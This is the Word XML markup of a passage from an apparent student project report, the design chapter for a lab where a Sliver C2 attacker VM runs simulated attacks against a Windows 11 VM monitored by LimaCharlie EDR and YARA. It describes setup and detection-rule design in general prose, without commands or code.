        <w:t>Chapter 4: Design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4.1 Architecture Overview</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architecture of the proposed cybersecurity project embodies a sophisticated ecosystem designed to simulate adversarial activities, detect threats in real-time, and orchestrate appropriate responses. The following components constitute the core of the architecture:</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679440" cy="3065145"/>
            <wp:effectExtent l="0" t="0" r="16510" b="1905"/>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pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5679440" cy="3065145"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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Components:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Ubuntu Attacker VM: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>This virtual machine serves as the platform for launching simulated cyber attacks. It hosts the Sliver C2 framework, enabling the execution of various adversarial actions against the victim system.</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4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Sliver C2 Session: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Sliver C2 acts as the command and control infrastructure through which the attacker communicates with compromised systems. It facilitates the execution of commands and payload delivery to the victim machine.</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4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Windows11 Victim VM:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Representing the target system, this virtual machine is subjected to simulated attacks orchestrated by the Ubuntu Attacker VM. It is equipped with the LimaCharlie EDR sensor for real-time monitoring of system activities and detection of potential threats.</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4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LimaCharlie EDR:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> LimaCharlie serves as the primary Endpoint Detection and Response (EDR) solution deployed on the victim VM. It continuously monitors system events, logs, and processes to identify suspicious activities indicative of cyber threats.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="397" w:leftChars="0" w:hanging="397"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YARA:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> YARA is integrated into the architecture as a malware detection tool. It is utilized for identifying specific patterns or signatures associated with known malware or malicious activities, enhancing the project's capabilities in threat detection.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Interactions:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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attacker (Ubuntu Attacker VM) initiates a Sliver C2 session with the victim machine (Windows11 Victim VM) to execute various cyber attacks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Sliver C2 session enables the attacker to interact with the victim machine, execute commands, and perform malicious activities, such as reconnaissance  and data exfiltration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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LimaCharlie EDR tool installed on the victim machine monitors and detects suspicious activities, alerts security analysts, and initiates response actions to mitigate cyber threats.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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YARA is utilized by LimaCharlie EDR for malware signature scanning and detection, enhancing the system's ability to identify and respond to known malware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4.2 Virtual Machine Setup</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virtual machine setup lays the foundation for the project's infrastructure, providing the necessary environments for conducting simulated cyber attacks and monitoring system activities. This section details the setup and configuration process for both the Ubuntu Attacker VM and the Windows11 Victim VM.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425"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Ubuntu Attacker VM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Ubuntu Attacker VM serves as the platform for initiating simulated cyber attacks using the Sliver C2 framework. The setup process for the Ubuntu Attacker VM involved the following steps:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>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Virtual Machine Creation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>A new virtual machine instance was created using VirtualBox, with Ubuntu selected as the guest operating system.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>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Operating System Installation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Ubuntu OS was installed on the virtual machine following standard installation procedures.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>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Networking Configuration: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Network settings were configured to establish connectivity with the Windows11 Victim VM, enabling communication between the attacker and victim systems during attack simulations.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Software Installation:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>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Sliver C2 Framework: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>The Sliver C2 framework was downloaded and installed on the Ubuntu Attacker VM, providing the necessary command and control capabilities for executing cyber attacks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425"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Windows11 Victim VM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Windows11 Victim VM represents the target system vulnerable to simulated cyber attacks orchestrated from the Ubuntu Attacker VM. The setup process for the Windows11 Victim VM involved the following steps:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>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Virtual Machine Creation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>A new virtual machine instance was created using VirtualBox, with Windows 11 selected as the guest operating system.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>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Operating System Installation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Windows 11 OS was installed on the virtual machine following standard installation procedures.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>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Networking Configuration:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Similar to the Ubuntu Attacker VM, network settings were configured to ensure connectivity with the Ubuntu Attacker VM, facilitating communication between the attacker and victim systems during attack simulations.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Software Installation:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="420" w:leftChars="0" w:hanging="420"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LimaCharlie EDR Sensor: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>The LimaCharlie EDR sensor software was downloaded and installed on the Windows11 Victim VM to enable real-time monitoring and threat detection capabilities.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4.3 Tool Installation and Configuration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Tool installation and configuration are crucial steps in preparing the cybersecurity project environment for conducting simulated attacks and monitoring system activities. This section outlines the process of installing and configuring essential tools on both the Ubuntu Attacker VM and the Windows11 Victim VM.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0"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Ubuntu Attacker VM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following tools were installed and configured on the Ubuntu Attacker VM to facilitate the execution of simulated cyber attacks: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Sliver C2 Framework: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Installation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>The Sliver C2 framework was downloaded and installed on the Ubuntu Attacker VM from the official GitHub repository of the BishopFox organization.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Configuration: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Initial configuration of the Sliver C2 framework was performed to set up listeners and establish communication channels for executing commands on the victim system. Permissions were granted to the Sliver server binary to make it executable.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Other Tools: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The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>mingw-w64 package</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> was installed to provide additional capabilities required for the Sliver C2 framework.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 working directory was created to organize Sliver C2-related files and configurations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0"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Windows11 Victim VM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On the Windows11 Victim VM, the focus was on installing and configuring the LimaCharlie EDR sensor to enable real-time monitoring and threat detection. The following steps were undertaken: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LimaCharlie EDR Sensor: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Installation:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> The LimaCharlie EDR sensor software was downloaded and installed on the Windows11 Victim VM to monitor system events and activities.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sensor was configured to ship Sysmon event logs alongside LimaCharlie's own EDR telemetry data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Configuration:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Initial configuration of the LimaCharlie EDR sensor was performed to establish connectivity with the LimaCharlie platform and start collecting telemetry data for threat detection and response.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Other Tools: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Supporting Software: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Additional software may have been installed and configured to enhance the capabilities of the LimaCharlie EDR sensor, such as log management tools or integration with third-party security solutions.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By installing and configuring the necessary tools on both the Ubuntu Attacker VM and the Windows11 Victim VM, the project environment was equipped to conduct simulated cyber attacks and monitor system activities in real-time.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4.4 Attack System Setup</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attack system setup involves configuring the Ubuntu Attacker VM to execute simulated cyber attacks using the Sliver C2 framework against the Windows11 Victim VM. This section outlines the steps undertaken to set up the attack system and initiate controlled adversarial actions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425"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Ubuntu Attacker VM Configuration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Sliver C2 Framework Installation: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Sliver C2 framework was downloaded and installed on the Ubuntu Attacker VM, providing the necessary command and control(C2) infrastructure for executing cyber attacks.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Launching Sliver C2 Session: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Once the listeners were set up, a Sliver C2 session was initiated on the Ubuntu Attacker VM, enabling the attacker to interact with the victim system and execute commands remotely.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Simulated Attack Scenarios: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Various simulated attack scenarios were devised and executed using the Sliver C2 framework, including reconnaissance, data exfiltration, and other malicious activities targeted at the victim system.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>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Interaction with Windows11 Victim VM</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Executing Simulated Attacks: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Using the established Sliver C2 session, simulated cyber attacks were executed against the Windows11 Victim VM. These attacks were carefully controlled and monitored to ensure the integrity of the project environment.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Monitoring Attack Activities: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LimaCharlie EDR sensor installed on the Windows11 Victim VM continuously monitored system activities, detecting and logging suspicious behaviors associated with the simulated attacks initiated from the Ubuntu Attacker VM.</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val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">-  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Response Actions: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Upon detecting potential threats or malicious activities, the LimaCharlie EDR sensor triggered response actions as per the configured detection and response rules, mitigating the impact of the simulated attacks on the victim system.</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By setting up the attack system and executing controlled adversarial actions, the project was able to assess the effectiveness of the detection and response mechanisms in place and evaluate the resilience of the victim system against cyber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4.5 Detection and Response Rule Design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design of detection and response rules is critical for identifying and mitigating cyber threats in real-time. This section outlines the process of designing and implementing detection and response rules within the LimaCharlie EDR platform.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>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Rule  Identification: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Detection and response rules were designed based on known attack patterns, indicators of compromise (IOCs), and security best practices.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Common attack vectors and tactics, such as malware execution, lateral movement, and data exfiltration, were considered in rule design.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>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Rule Creation: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Detection rules were created within the LimaCharlie EDR platform to monitor system events and identify suspicious activities indicative of cyber threats.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Response rules were defined to trigger automated actions in response to detected threats, such as isolating affected systems, terminating malicious processes, or alerting security personnel.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>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Rule Testing and Refinement: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Detection and response rules were tested in a controlled environment to validate their effectiveness in detecting and mitigating simulated cyber attacks.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Rule parameters were adjusted and refined based on observed outcomes and feedback from testing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>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Integration with YARA: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YARA signatures were integrated into detection rules to enhance the system's ability to identify known malware and malicious activities.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YARA scans were triggered based on predefined conditions, such as file downloads or process executions, to detect potential threats in real-time.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cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="365F91"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="365F91"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Chapter 5: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="365F91"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Implementation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="365F91"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
